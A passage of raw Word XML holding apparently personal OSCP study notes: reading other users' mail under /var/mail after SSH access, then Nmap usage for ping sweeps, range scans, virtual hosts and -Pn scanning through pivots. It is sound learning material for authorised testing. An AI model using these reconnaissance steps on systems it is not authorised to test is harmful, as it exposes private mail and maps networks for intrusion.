          <w:numId w:val="1463"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Try using the "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mail</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" command which will list of mail messages for the user.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002894">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002895">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1463"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /var/mail/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">marcus</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002896">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1463"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace "marcus" with the user you are SSH'd into</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002897">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002898">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1463"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd /var/mail</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and just look around</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002899">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>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9C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000289D">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000289E">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000289F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_wx5mrasxotvy" w:id="355"/>
      <w:bookmarkEnd w:id="355"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nmap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028A0">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Note: After finding that a website has virtual hosting, add to /etc/hosts and then RUN NMAP AGAIN with the IP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028A1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028A2">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NMAP NSE scripts can be found in</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> OSCP 7.3.1. NSE Vulnerability Scripts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="799"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">More in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OSCP 12.3.3. Nmap NSE Scripts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028A4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028A5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Note:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028A6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1126"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can scan multiple IP with one nmap command, like below:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1126"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -sT -Pn -p 21,80,443 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">172.16.6.240 172.16.6.241 172.16.6.254</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028A8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1126"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -sT -Pn -p 21,80,443 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.216.245-250</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1126"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is how to specify a range</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028AA">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028AB">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ping sweep (tells you what hosts are on this subnet):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028AC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="634"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -sn 192.168.1.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028AD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="634"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.1.0/24 covers 192.168.1.1 through 192.168.1.254.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028AE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="634"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This will tell you which hosts on your local LAN are up.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028AF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="634"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -sn 10.0.0.1-50</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028B0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="634"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Only scans 10.0.0.1 through 10.0.0.50.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028B1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="634"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -sn 172.16.5.1 172.16.5.5 172.16.5.10</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028B2">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028B3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1358"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">BE CAREFUL. As seen in the OSCP Challenge Labs, sometimes machines have software firewalls enabled and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">may not respond to ICMP echo requests</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Ping sweep (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-sn</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) relies on these pings (ICMP echo requests), and so it will think that the machines are down. So, keep that in mind when doing ping sweeps</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028B4">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028B5">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">No Ping (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-Pn</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028B6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="689"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Skip host discovery</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028B7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="689"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">By default, before scanning, Nmap tries to check if a host is alive (using ICMP echo, TCP SYN to port 443/80, etc.). If the host doesn’t reply, Nmap marks it as “down” and skips scanning.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028B8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="689"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">With -Pn → Nmap assumes every target is up, skips host discovery, and goes straight to port scanning.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028B9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="689"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is useful when:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028BA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="689"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ICMP is blocked by firewalls.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="689"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You’re scanning through a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tunnel/pivot (like Ligolo, Chisel, SSH tunnel)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, where ping might not work.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="689"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You don’t want to miss machines that drop ICMP but still have open ports.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028BD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="689"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Downside: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028BE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="689"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">t can </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">waste time scanning dead hosts</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, since it assumes all are up.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028BF">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
